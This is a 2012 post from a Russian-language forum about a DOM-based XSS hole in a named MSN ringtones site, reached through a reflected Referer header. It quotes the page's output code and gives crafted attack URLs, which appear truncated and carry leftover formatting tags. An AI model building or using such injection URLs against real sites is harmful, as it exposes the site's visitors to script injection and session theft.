Показать сообщение отдельно

  #9  
Старый 19.01.2012, 09:58
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от dev1k  
Ещё один msn.com

http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>
Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.

Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.

Данные из реферера выводятся в двух местах:

Цитата:
Сообщение от None  
d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no ,status=yes,menubar=no,scrollbars=yes,resizable=no ,copyhistory=no,width=600,height=450,screenX=0,scr eenY=0,top=0,left=0");');
Цитата:
Сообщение от None  
d.writeln('[/COLOR][/B]
">');
Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.

В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?

http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]

Без них все работает нормально:

[B]http://ringtones.nl.msn.com/games.php?rtlo=">
 
Ответить с цитированием